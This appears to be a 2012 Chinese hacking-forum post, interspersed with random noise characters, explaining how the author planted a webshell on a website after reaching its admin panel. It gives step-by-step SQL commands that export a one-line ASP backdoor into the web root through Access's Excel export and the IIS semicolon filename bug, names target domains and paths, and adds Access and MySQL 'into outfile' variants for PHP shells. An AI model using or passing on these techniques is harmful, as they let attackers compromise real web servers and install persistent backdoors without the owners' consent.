好不容易进了后台,发现啥上传啊。备份啊多木有。
' @- r7 e& w, H, ~# Ywebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的- D" Q; A1 C- o* Q9 f
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,, o; Y8 v9 m0 I' {
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:1 n/ E( X3 Q+ L+ g
1.create table cmd (a varchar(50))
. k& N5 E5 E8 i2.insert into cmd (a) values (‘‘)/ t A" R+ T7 W f
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
& i* h1 e2 G( ^+ B0 i6 J(把表cmd的内容导出为物理路径的一个EXCEL文件)
: t% I& A% @! B7 G$ I. |; q4.drop table cmd) ?0 K3 c3 M( J4 T; p
利用IIS的BUG成功拿到了WEBSHELL。
9 j8 B$ a% q: ]! E1 J/ v% _+ k
+ P: i7 `( a- E8 H9 g直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
3 ]1 j( u+ L; U+ U D
2 Q3 p" O0 V5 f* i( D3 r SQL语句意思解释:
# i( ^0 J. ]# a0 {2 ? 第一句* _3 H) ^5 n! q. b' @: \" q
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50% a9 n( V1 s2 Q
0 |; o; i8 Q9 ^" b7 z
第二句
/ h9 j& m' `, h! L9 S 在表cmd的a字段插入一句话木马* F4 a5 K" h0 A% z
第三句% j. c5 _, d8 s- e
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
3 Z; x; @4 z/ x/ _: B8 |/ E7 |. j6 e$ g' F
第四句
s. J" s# }5 K: Y/ J1 k6 a 删除建立的cmd表$ @0 Y; U. ?5 ^3 m3 }
$ J \8 B1 I8 m* R0 P 以下内容为测试:1 p; {* R5 S( @, m1 k
Access利用后台SQL执行命令功能导出WebShell:1 B7 u6 Z# P4 g/ n* J* S
这个更简单:
6 \, s# S5 t' N2 ?3 t- ^ [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]$ I: L1 `) u- f+ R M( C( U, S9 E7 E2 C
或者
% r* L% M/ l# R. G [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]2 \- D' E! {" k* @2 a
5 \% ?5 t; ^ p* o Y 后台有执行SQL语句功能(vote为已知表段)6 g: w5 D; b5 L
希望对大家有所帮助拿shell的又一个思路
& q8 z, Y' q& h4 y |
发表于 2012-9-13 17:53:58
收藏
支持
反对